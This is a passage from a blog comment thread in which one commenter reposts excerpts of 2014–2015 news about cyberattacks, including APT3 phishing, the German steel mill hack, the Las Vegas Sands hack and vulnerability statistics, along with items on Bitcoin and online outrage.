    But what about situations where we should get mad? In 2014 we got mad on the internet about a lot of things we saw, many of which we saw on the internet, many of which we wouldn’t have been able to see without the internet, many of which we were very justified in our anger over.

    To grow weary of the outrage cycle is totally understandable — I am, emphatically, and I think more and more people will be in the coming year.

    At my most pessimistic, it’s hard not to hear each successive internet outrage as a dying tone ringing in our ears for the last time after yet another deafening blow to our trust in the essential goodness of the world.

    The logic goes that transparency makes everyone accountable. That the distribution of as much information as possible naturally leads to a society-wide system of checks and balances. This was an argument for the public airing of some of the more vitriolic emails from the Sony leak

    The anticlimactic answer is probably that we wait. The internet and its transparency and outrage are both younger and faster than the people currently in charge of our movie studios and police departments.

    An inevitable side effect of seeing more things, it seems, is finding more things boring.

    Reply
  13. Tomi Engdahl says:

    Zero-day hacking group resorts to UNICORN SMUT-SLINGING
    Playboy ploy not beneath APT3
    26 Nov 2014
    http://www.theregister.co.uk/2014/11/26/zeroday_group_degenerates_into_unicorn_smut_slinging/

    Sysadmins who have not yet patched their Windows boxes against the 18-year-old “unicorn-like” OLE bug disclosed last month could expect a deluge of spear phishing smut from a group once confined to lofty targeted zero-day attacks.

    The talented APT3 group was behind widespread zero-day attacks code-named Clandestine Fox earlier this year and was now targeting recently patched Windows vulnerabilities, according to FireEye researchers.

    That group had begun spewing spear-phishing emails targeting two vulnerabilities (CVE-2014-6332, CVE-2014-4113) disclosed this month and in October respectively.

    “The use of CVE-2014-6332 is notable, as it demonstrates that multiple classes of actors, both criminal and APT alike, have now incorporated this exploit into their toolkits,” they said in an advisory.

    Reply
  14. Tomi Engdahl says:

    State of Bitcoin 2015: Ecosystem Grows Despite Price Decline
    http://www.coindesk.com/state-bitcoin-2015-ecosystem-grows-despite-price-decline/

    CoinDesk is pleased to announce the latest quarterly State of Bitcoin report, featuring a 2014 Year in Review, an in-depth analysis of data and events from the fourth quarter of 2014 and a look ahead to what 2015 might bring.

    Overall, 2014 could be characterized as a ‘Tale of Two Bitcoins’.

    On the one hand, significant bitcoin venture investment continued and much progress was made in furthering adoption, particularly in bitcoin payment acceptance by big brand names such as Microsoft and Dell.

    On the other hand, early on in 2014, the collapse of Mt Gox dealt a crippling blow to bitcoin’s extraordinary price momentum.

    All-time bitcoin startup VC investment crosses $400 million

    Reply
  15. Tomi Engdahl says:

    The Real Story Behind the Kate Upton Nude DDoS Attack
    http://www.securityweek.com/real-story-behind-kate-upton-nude-ddos-attack

    I recently heard about an interesting DDoS story in New Zealand involving the nude selfies of cover girl Kate Upton and Hunger Games star Jennifer Lawrence. The photos were stolen from Apple’s iCloud service. The story seemed like the perfect, illustrative fable about everything that is wrong with Internet security today. It had all the classic buzzwords: cloud security, malware, DDoS, Apple, 4chan, and lazy, lustful Internet users.

    Kate Upton Photos Crash the InternetBut while parts of the story were true, others…not so much.

    The first third of the story is more or less true; the personal data of the celebrities was indeed ex-filtrated from iCloud. Apple claims that it was due to the weak iCloud passwords used by the celebs themselves, but that explanation is just semantics. If you read an EULA carefully (many of them 25 pages or more), you will find that you personally are responsible for the security of your data in the cloud. That’s the state of cloud security today.

    The middle part of the story is true as well: nearly every site hosting the celebrity photos was also hosting some kind of malware.

    Ultimately, it turned out to be sheer coincidence that the attack happened in the days just after the iCloud breach. The media was so taken with the idea that Kate Upton nude photos had caused a DDoS attack that they just took the story and ran with it. It’s not difficult to understand why

    Reply
  16. Indian image bank says:

    Thanks for your marvelous posting! I truly enjoyed reading it, you could be a great
    author. I will make sure to bookmark your blog
    and will often come back very soon. I want to encourage you to continue your great work, have
    a nice morning!

    Reply
  17. Tomi Engdahl says:

    2014: A Monumental Year for Cyber Attacks
    http://www.eetimes.com/author.asp?section_id=36&doc_id=1325433&

    As consumer and industrial IoT adoption rises, so does the risk for cyber-attacks. Here’s what happened in 2014, as a reminder and warning.

    In every single month in 2014, the cyber world experienced an attack that would have made the top-three list in any previous year. The numbers were stunning all year long: 56 million hacked at Home Depot, 76 million at JP Morgan Chase. Target, K-Mart, UPS, and the year’s most colorful attack — Sony Pictures Entertainment — all got hit.

    The Sony Pictures Entertainment hack grabbed so much cyber ink, nobody noticed that the company’s PlayStation network was attacked — yet again — in early December, creating a system-wide outage. This month-by-month list is mind-numbing. And we left off the small hacks that only affected a few hundred thousand users.

    Reply
  18. Tomi Engdahl says:

    The State of Email Trust 2014 Report
    http://info.agari.com/state-of-email-trust-2014.html

    As you saw in the headlines and news, 2014 was a big year for email threats.
    And from our findings – the proof is in the data.

    By summarizing the TrustIndex data we gathered quarterly in 2014 that measures how well both individual companies and industries as a whole are protecting their customers from email cyberattacks, we saw that email security improved somewhat in 2014, but most companies still haven’t implemented technology that protects them from cybercrime.

    Reply
  19. Tomi Engdahl says:

    Don’t be fooled! He’s not from the IT crowd… he’s a CYBERSPY – FireEye
    Is that Tom the techie or a Chinese spear-phisherman?
    http://www.theregister.co.uk/2015/02/24/fireeye_threat_report/

    Impersonating IT departments in spear-phishing attacks is becoming an increasingly popular tactic among hackers, particularly in cyber-espionage attacks.

    IT staff themed phishing emails comprised 78 per cent of observed phishing schemes picked up by FireEye in 2014, compared to just 44 per cent in 2013.

    The sixth annual FireEye Mandiant M-Trends report, published on Tuesday, reports that organisations are getting slightly speedier at picking up trespassers in their network. Breach detection times dropped from 229 days in 2013 to 205 days last year. The slight improvement still means that successful hacker attacks remain undetected for months.

    In some cases breaches can go undetected for years.

    Hackers are adopting more sophisticated and stealthy tactics.

    More details can be found in the 2015 Mandiant M-Trends report
    https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

    Reply
  20. Tomi Engdahl says:

    HP: 10 most common security issues in 2014 were from code over two years old
    … and sometimes dating back decades
    http://www.theinquirer.net/inquirer/news/2396783/hp-10-most-common-security-issues-in-2014-were-from-code-over-two-years-old

    NEARLY HALF of all security breaches come from vulnerabilities that are between two and four years old, according to this year’s HP Cyber Risk Report entitled The Past Is Prologue.

    The annual report found that the most prevalent problems came as a result of server misconfiguration, and that the primary causes of commonly exploited software vulnerabilities are defects, bugs and logic flaws.

    But perhaps most disturbing of all was the news that Internet of Things (IoT) devices and mobile malware have introduced a significant extra security risk.

    The entire top 10 vulnerabilities exposed in 2014 came from code written years, and in some cases decades, previously.

    “Many of the biggest security risks are issues we’ve known about for decades, leaving organisations unnecessarily exposed,” said Art Gilliland, senior vice president and general manager for enterprise security products at HP.

    “We can’t lose sight of defending against these known vulnerabilities by entrusting security to the next silver bullet technology. Rather, organisations must employ fundamental security tactics to address known vulnerabilities and, in turn, eliminate significant amounts of risk.”

    Reply
  21. Tomi Engdahl says:

    A Cyberattack Has Caused Confirmed Physical Damage for the Second Time Ever
    http://www.wired.com/2015/01/german-steel-mill-hack-destruction/

    Amid all the noise the Sony hack generated over the holidays, a far more troubling cyber attack was largely lost in the chaos. Unless you follow security news closely, you likely missed it.

    I’m referring to the revelation, in a German report released just before Christmas (.pdf), that hackers had struck an unnamed steel mill in Germany. They did so by manipulating and disrupting control systems to such a degree that a blast furnace could not be properly shut down, resulting in “massive”—though unspecified—damage.

    This is only the second confirmed case in which a wholly digital attack caused physical destruction of equipment. The first case, of course, was Stuxnet

    It’s not clear when the attack in Germany took place. The report, issued by Germany’s Federal Office for Information Security (or BSI), indicates the attackers gained access to the steel mill through the plant’s business network, then successively worked their way into production networks to access systems controlling plant equipment. The attackers infiltrated the corporate network using a spear-phishing attack

    Once the attackers got a foothold on one system, they were able to explore the company’s networks, eventually compromising a “multitude” of systems, including industrial components on the production network.

    “Failures accumulated in individual control components or entire systems,” the report notes. As a result, the plant was “unable to shut down a blast furnace in a regulated manner” which resulted in “massive damage to the system.”

    “The know-how of the attacker was very pronounced not only in conventional IT security but extended to detailed knowledge of applied industrial controls and production processes,” the report says.

    The report doesn’t name the plant or indicate when the breach first occurred or how long the hackers were in the network before the destruction occurred.

    The report also illustrates the need for strict separation between business and production networks to keep hackers from leaping from one network to another and remotely accessing critical systems over the internet. Although a network can only be considered truly air-gapped if it’s not connected to the internet and is not connected to other systems that are connected to the internet, many companies believe that a software firewall separating the business and production network is sufficient to stop hackers from making that leap. But experts warn that a software firewall can be misconfigured or contain security holes that allow hackers to break through or bypass them nonetheless.

    Reply
  22. Tomi Engdahl says:

    Iran hacks America where it hurts: Las Vegas casinos
    Digital Pearl Harbour debunked by US director of national intelligence
    http://www.theregister.co.uk/2015/02/27/iran_behind_us_casino_hack/

    US director of National Intelligence James Clapper has accused Iran of orchestrating a 2014 hack of the Las Vegas Sands casino. The attack crippled the magnificent cultural institution’s IT infrastructure.

    Clapper told a US Senate Armed Services Committee Thursday (US time) that the hack of the US$14 billion casino was the handiwork of Iran rather than ordinary hacking groups, Bloomberg reports.

    “While both of these nations (Iran and North Korea) have lesser technical capabilities in comparison to Russia and China, these destructive attacks demonstrate that Iran and North Korea are motivated and unpredictable cyber-actors,” Clapper says.

    The attacks brought down the casino’s IT systems including email but not the most valuable components of the organisation.

    The gambling giant said at the time that punters’ credit card details were safe.

    Las Vegas Sands appears to have been targeted due to the casino chief executive office Sheldon Adelson’s public support of Israel, according to Bloomberg.

    The alleged Iranian hackers commandeered the website emblazoning it with a shoddy slapdash image of the Casino’s US sites in flames

    DON’T PANIC! No credit card details lost after hackers crack world’s largest casino group
    Las Vegas Sands email and website still down after hackers trash CEO Sheldon Adelson
    http://www.theregister.co.uk/2014/02/13/dont_panic_no_credit_card_details_lost_after_hackers_crack_worlds_largest_casino_group/

    Reply
  23. Tomi Engdahl says:

    And the buggiest OS provider award goes to … APPLE?
    Count of 2014′s flaws finds more nasties in Mac OS and iOS than in Windows or Linux
    http://www.theregister.co.uk/2015/02/26/windows_beats_apple_linux_with_fewest_bugs_for_2014/

    Apple’s operating systems and Linux racked up more vulnerability reports than Windows during 2014, according to research from security outfit GFI.

    Cupertino’s OS X and iOS platforms topped the 2014 bug charts with 147 and 127 holes disclosed in each, nudging out the Linux Kernel with 119 flagged flaws, the National Vulnerability database statistics show.

    Apple also has the most high-risk holes with 64 reported in OS X, and is just nudged out by Linux in the medium-severity stakes which clocked 74 flaws to iOS’ 72.

    Windows platforms were far behind with 68 total reported bugs and 20 medium-severity flaws reported. Surveyed Windows releases included Windows 8, 8.1, 7, Vista, and RT, along with Server 2012 and 2008. All had between 30 and 38 vulnerabilities.

    Crucially, up to 80 percent of the reported bugs concerned third party applications, and only 13 percent related to the operating systems in question.

    Reply

Leave a Reply to Tomi Engdahl Cancel reply

Your email address will not be published. Required fields are marked *

*

*